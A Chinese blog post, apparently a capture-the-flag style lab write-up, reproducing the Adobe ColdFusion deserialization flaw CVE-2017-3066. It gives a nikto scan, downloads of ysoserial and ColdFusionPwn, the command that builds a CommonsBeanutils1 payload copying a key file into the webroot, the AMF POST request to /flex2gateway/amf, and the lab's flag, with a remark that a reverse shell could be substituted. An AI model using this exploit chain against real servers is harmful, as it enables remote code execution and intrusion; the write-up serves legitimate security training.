Adobe ColdFusion 反序列化漏洞靶场复现(CVE-2017-3066)

最新推荐文章于 2025-03-12 14:18:39 发布
最新推荐文章于 2025-03-12 14:18:39 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43232893/article/details/115610999
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

墨者学院之Adobe ColdFusion 反序列化漏洞靶场复现(CVE-2017-3066)

简介

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。

提示:以下是本篇文章正文内容,下面案例可供参考

一、漏洞复现

可参考Vulnhub官方复现教程
https://vulhub.org/#/environments/coldfusion/CVE-2017-3066/

开启环境

访问url后发现为404,注意:并不是靶场问题。可以使用nikto工具进行敏感路径探测。
在这里插入图片描述

nikto -h http://219.153.49.228:40275 //路径探测

这里可以看出存在一个/CFIDE/administrator/index.cfm
在这里插入图片描述
在这里插入图片描述
由于没有密码所以登录不了

CVE-2017-3066漏洞复现

使用ColdFusionPwn工具来生成POC。

工具下载:
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
wget https://github.com/codewhitesec/ColdFusionPwn/releases/download/0.0.1/ColdFusionPwn-0.0.1-SNAPSHOT-all.jar

使用命令生成poc,由于在靶场简介上写着网站的绝对路径跟key文件的路径所以这里我们可以使用cp命令来将根目录下的key文件复制到wwwroot目录下的key.txt文件里面
'cp /KEY.txt /opt/coldfusion11/cfusion/wwwroot/key.txt’里可替换为其他可执行命令并生成poc如反弹shell命令,但此靶场并不能弹shell,但通过自己搭建的靶场可以看出需要反弹shell的话需要bash加密

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'cp /KEY.txt /opt/coldfusion11/cfusion/wwwroot/key.txt' poc.ser

注:复现此漏洞需要低版本的burp进行,我这里用的是1.6版本的burp
把刚刚生成的poc文件导入到burp里,再把Content-Type字段的内容改为application/x-amf
数据包poc:

POST /flex2gateway/amf HTTP/1.1
Host: ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2884

[--poc--]

漏洞说在位置为/flex2gateway/amf,使用POST请求方式,导入poc文件时不要用复制粘贴,用burp进行导入,如下:
在这里插入图片描述

在这里插入图片描述
发包后就可以直接访问key.txt文件获得key,key为:mozhe0f606630141b5f2385502cb67f6
在这里插入图片描述
如果访问不了请多试几次也可以换成其他的命令生成poc

Adobe ColdFusion 反序列化漏洞复现CVE-2023-29300)
0xSec
08-02 3027
Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。
Adobe ColdFusion 反序列化漏洞复现(CVE-2023-38203)
0xSec
01-27 1031
Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。
利用Vulnhub复现漏洞 - Adobe ColdFusion 反序列化漏洞CVE-2017-3066
JiangBuLiu的博客
06-28 5238
Adobe ColdFusion 反序列化漏洞CVE-2017-3066)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC500错误 Vulnhub官方复现教程 https://vulhub.org/#/environments/coldfusion/CVE-2017-3066/ 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的C...
Adobe ColdFusion 反序列化漏洞CVE-2017-3066
DaWan
04-13 578
Adobe ColdFusion 反序列化漏洞CVE-2017-3066)环境搭建漏洞利用反弹shell 环境搭建 使用vulhub进行环境搭建,具体步骤可参考这里。 漏洞利用 环境启动成功,访问http://192.168.36.128:8500/CFIDE/administrator/index.cfm,输入密码vulhub,即可成功安装Adobe ColdFusion 输入密码后,点击OK,页面如下: 需下载内容 ColdFusionPwn-0.0.1-SNAPSHOT-all.j
WEB常见漏洞反序列化,从零基础到精通,收藏这篇就够了!
最新发布
喜欢Python编程的程序员柚柚呀
03-12 960
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中。
CVE-2017-3066(Adobe ColdFusion 反序列化漏洞)
G_Fu_Q的博客
04-08 1530
本文仅做漏洞复现记录与实现,请勿用于非法用途 漏洞介绍: Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。 以下版本受
Vulhub-coldfusion--CVE-2017-3066
Ronin_qianmo的博客
07-29 538
1、漏洞描述 Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。 攻击者可利用该漏洞在冲突应用程序的一部分中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion(2016版)更新3及之前的版本, ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。 2、启动靶场 3、访问网址 http://x.x
漏洞复现-Adobe ColdFusion 反序列化漏洞CVE-2023-29300)
玄道的网安博客
08-11 1701
对于 ColdFusion 来说,WDDX 中的每个元素都是一个WddxElement,不同的元素对应着不同的Handler处理类,例如标签中的元素与属性将由StringHandler处理,标签会由StructHandler处理。分析findAttribute()方法可知,参数为url.xxx表示从请求的 URL 中获取xxx的参数值,form.yyy表示从上传的表单中获取yyy的参数值。.wddx.DeserializerWorker.java文件中的显着变化。
10 - vulhub - Adobe ColdFusion 反序列化漏洞 (CVE-2024-3066)
2401_83946044的博客
03-28 265
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
vulhub:Adobe ColdFusion文件读取漏洞复现CVE-2010-2861)
sszsNo1的博客
07-02 398
vulhub:Adobe ColdFusion文件读取漏洞CVE-2010-2861)如何复现
Adobe_ColdFusion文件读取漏洞 CVE-2010-2861 漏洞复现
ADummy的博客
02-22 1020
Adobe ColdFusion文件读取漏洞(CVE-2010-2861) by ADummy 0x00利用路线 ​ 第三方UI与目标进行通信—>搭建http服务器—>让目标下载恶意文件—>定时任务执行—>反弹shell 0x01漏洞介绍 ​ AdobeColdFusion是一款高效的网络应用服务器开发环境。AdobeColdFusion9.0.1及之前版本的管理控制台中存在多个目录遍历漏洞。远程攻击者可借助向CFIDE/administrator/中的CFIDE/admin
Adoble ColdFusion反序列化漏洞CVE-2017-3066
Kevin's Blog
01-18 946
文章目录一、介绍1.1 漏洞介绍1.2 影响版本二、漏洞复现三、防御 一、介绍 1.1 漏洞介绍   Adoble ColdFusion是一个动态Web服务器,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。   低版本的Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服 务。 1.2 影响版本 Ad
CVE-2010-2861漏洞复现(ColdFusion未授权漏洞)
G_Fu_Q的博客
04-08 947
漏洞介绍: Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。 Coldfusion 最早是由 Allaire 公司开发的一种应用服务器平台,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.c
反序列化漏洞靶场
leah126的博客
02-11 1865
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。此外,还将收集网上一些其他常用框架的反序列化链,对收录的所有反序列化链进行漏洞分析复现,并给出自己的 poc,以供参考。Laravel_5.4.0_9.3.6+_反序列化链_RCE1。
Apache Shiro 反序列化漏洞靶场
qq_42947816的博客
02-02 4622
1.漏洞描述 Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 2.漏洞简单分析 Shiro提供了一种下次访问时无需再登录就可访问的功能,即“记住我”功能。Shiro对remem
Adobe ColdFusion反序列化漏洞(cve-2017-3066)
山兔的博客
08-03 651
Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。
10 - vulhub - Adobe ColdFusion 反序列化漏洞 (CVE-2017-3066)
易编橙 · 终身成长社群,相遇已是上上签!
10-20 3809
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值